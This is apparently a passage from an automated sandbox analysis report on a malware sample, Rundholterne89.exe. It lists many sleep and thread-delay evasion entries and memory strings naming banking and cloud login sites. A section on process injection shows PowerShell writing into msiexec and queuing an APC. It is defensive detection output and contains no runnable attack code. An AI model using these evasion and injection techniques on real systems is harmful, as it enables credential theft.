          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598668Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598447Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597907Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597782Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597438Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597313Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597188Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596949Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596238Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595667Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595449Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6053Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3639Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep count: 36 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -33204139332677172s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120Thread sleep count: 7324 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1120Thread sleep count: 2500 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599657s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599532s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599407s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599282s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599157s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -599032s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598919s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598804s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598668s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598447s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -598016s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597907s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597782s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597563s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597438s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597313s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597188s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -597063s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596949s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596844s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596719s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596238s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -596110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -595985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -595797s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -595667s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -595449s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -595344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -595235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -595110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -594110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -593985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3096Thread sleep time: -593860s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599157Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599032Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598919Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598804Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598668Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598447Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597907Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597782Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597438Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597313Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597188Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596949Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596238Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595667Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595449Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000063A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: msiexec.exe, 00000006.00000002.2626954688.00000000245BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
          Source: msiexec.exe, 00000006.00000002.2626954688.000000002429D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
          Source: C:\Users\user\Desktop\Rundholterne89.exeAPI call chain: ExitProcess graph end nodegraph_0-3316
          Source: C:\Users\user\Desktop\Rundholterne89.exeAPI call chain: ExitProcess graph end nodegraph_0-3164
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_002ED044 LdrInitializeThunk,LdrInitializeThunk,6_2_002ED044
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3F40000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
